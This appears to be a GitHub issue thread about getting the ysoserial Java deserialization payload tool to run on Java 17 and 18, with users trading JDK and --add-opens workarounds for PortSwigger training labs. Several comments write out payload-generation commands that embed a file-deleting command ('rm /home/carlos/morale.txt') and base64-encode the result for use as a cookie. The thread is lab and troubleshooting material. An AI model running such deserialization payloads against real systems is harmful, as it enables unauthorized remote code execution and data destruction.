Closed otium44 closed 7 months ago
Same issue with Java 18
$ java --version
openjdk 18.0.2 2022-07-19
OpenJDK Runtime Environment (build 18.0.2+10)
OpenJDK 64-Bit Server VM (build 18.0.2+10, mixed mode, sharing)
$ java -jar ysoserial.jar CommonsCollections1 calc.exe
Error while generating or serializing payload
java.lang.reflect.InaccessibleObjectException: Unable to make sun.reflect.annotation.AnnotationInvocationHandler(java.lang.Class,java.util.Map) accessible: module java.base does not "opens sun.reflect.annotation" to unnamed module @7fbd2524
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:354)
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:297)
at java.base/java.lang.reflect.Constructor.checkCanSetAccessible(Constructor.java:191)
at java.base/java.lang.reflect.Constructor.setAccessible(Constructor.java:184)
at ysoserial.payloads.util.Reflections.setAccessible(Reflections.java:26)
at ysoserial.payloads.util.Reflections.getFirstCtor(Reflections.java:55)
at ysoserial.payloads.util.Gadgets.createMemoizedInvocationHandler(Gadgets.java:72)
at ysoserial.payloads.util.Gadgets.createMemoitizedProxy(Gadgets.java:67)
at ysoserial.payloads.CommonsCollections1.getObject(CommonsCollections1.java:71)
at ysoserial.payloads.CommonsCollections1.getObject(CommonsCollections1.java:43)
at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
Ok but how can i run ysoserial.jar with another version of java?
When I run Ysoserial I got these's errors :
Error while generating or serializing payload
$ java -jar ysoserial.jar CommonsCollections4 'Payload' java.lang.IllegalAccessError: class ysoserial.payloads.util.Gadgets (in unnamed module @0x4015e7ec) cannot access class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl (in module java.xml) because module java.xml does not export com.sun.org.apache.xalan.internal.xsltc.trax to unnamed module @0x4015e7ec at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:102) at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:32) at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:26) at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
I found out that's errors happen only with Java 17. I saw some people facing the same problem online. When run it again on java 15 it worked. More Info:
$ java --version openjdk 17.0.6 2023-01-17 OpenJDK Runtime Environment (build 17.0.6+10-Debian-1) OpenJDK 64-Bit Server VM (build 17.0.6+10-Debian-1, mixed mode, sharing)
THIS IS THE SOLUTION FOR LINUX:
This solution worked for me. Im making a (Portswigger lab) and i need this software works. Here you can find step by step how i fixed it.
sudo apt-get install openjdk-11-jdk
nano ~/.bashrc
export PATH="/usr/lib/jvm/java-11-openjdk-amd64/bin:$PATH"
source ~/.bashrc
java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Alternative and easy way:
sudo apt update -y
sudo apt install openjdk-11-jdk
sudo update-alternatives --config java
java --version
7. true
I'm also did it for port swigger lab I did it with java 15
For anyone still wanting to use Java 17, it is possible through the --add-opens
option in java
. See https://github.com/frohoff/ysoserial/issues/176 for more details, with a script I made that does this automatically in a comment there
I also stumbled over this issue while doing the Portswigger Labs. However, I didn't want to have a second java installation on my system. I found a way of making it work with Java 17 simply by shifting around the arguments of the call. On the Portswigger page, they give the following hint for Java 17 users:
java -jar ysoserial-all.jar \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-opens=java.base/java.net=ALL-UNNAMED \
--add-opens=java.base/java.util=ALL-UNNAMED \
[payload] '[command]'
However, I still got only the normal startup prompt:
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Y SO SERIAL?
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
Available payload types:
[List of payloads here]
Since it looked as if ysoserial didn't recognize the arguments correctly, I finally came up with this order, which worked fine in Kali:
java \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED\
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED\
--add-opens=java.base/sun.reflect.annotation=ALL-UNNAMED\
-jar ./ysoserial.jar <payload> <command>
Hope this helps someone :)
I also stumbled over this issue while doing the Portswigger Labs. However, I didn't want to have a second java installation on my system. I found a way of making it work with Java 17 simply by shifting around the arguments of the call. On the Portswigger page, they give the following hint for Java 17 users:
java -jar ysoserial-all.jar \ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \ --add-opens=java.base/java.net=ALL-UNNAMED \ --add-opens=java.base/java.util=ALL-UNNAMED \ [payload] '[command]'
However, I still got only the normal startup prompt:
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true Y SO SERIAL? Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]' Available payload types: [List of payloads here]
Since it looked as if ysoserial didn't recognize the arguments correctly, I finally came up with this order, which worked fine in Kali:
java \ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED\ --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED\ --add-opens=java.base/sun.reflect.annotation=ALL-UNNAMED\ -jar ./ysoserial.jar <payload> <command>
Hope this helps someone :)
Worked like a charm for me! I used Kali Linux v2023.3 with Java v17.0.8 to solve PortSwigger's lab
Thanks for sharing, you've saved me hours of further research & testing.
BTW , whoever still struggling with that particular lab or ysoserial , I recommend using Java 8. Here is how it worked for me (Linux):
tar xvf openjdk-bla-bla-bla.tar.gz
/home/user/Downloads/java-se-8u43-ri/bin/java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64 > cookie.txt
Hope it helps ;)
@Anawak , thanks bro, your solution worked for portswigger lab no 5, for java 17 version users: ...................................................
java \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED\
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED\
--add-opens=java.base/sun.reflect.annotation=ALL-UNNAMED\
-jar ./ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64
Duplicate of #176
thanks bro, your solution worked for portswigger lab no 5, for java 17 version users:
java \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED\
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED\
--add-opens=java.base/sun.reflect.annotation=ALL-UNNAMED\
-jar ./ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt'|base64 >tee.txt
When I run Ysoserial I got these's errors :
Error while generating or serializing payload
I found out that's errors happen only with Java 17. I saw some people facing the same problem online. When run it again on java 15 it worked. More Info: